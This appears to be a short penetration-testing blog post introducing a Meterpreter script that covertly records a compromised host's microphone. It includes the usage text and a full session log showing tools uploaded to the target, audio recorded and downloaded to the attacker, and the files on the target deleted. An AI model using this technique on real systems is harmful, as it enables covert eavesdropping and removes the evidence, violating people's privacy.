As requested yesterday by Paul in Pauldotcom Security Weekly podcast I wrote a small script to record all sound captured by a targets host microphone in an OGG sound file and upload such file back to the attacking machine. The tool used in linco that was suggested by Byte_Bucket in the pauldotcom IRC Channel.
meterpreter > run soundrecorder -hMeterpeter script to Record all sound from built in sound sourceon target hostOPTIONS:-h Help menu.-t <opt> Record Time in seconds.meterpreter > run soundrecorder -t 3[*] Uploading /pentest/exploits/framework3/data/linco.exe....[*] /pentest/exploits/framework3/data/linco.exe uploaded![*] Uploading /pentest/exploits/framework3/data/oggenc.exe....[*] /pentest/exploits/framework3/data/oggenc.exe uploaded![*] Recording...[*] stopping recording ...[*] Recording Stopped[*] Downloading sound file ...[*] File Downloaded to /root/.msf3/logs/soundrecord/18.104.22.1680046/out.ogg[*] Deleting left over files...[*] Files on target deletedmeterpreter >
4/3/09 Updated the help screen to indicate that the record time is in seconds.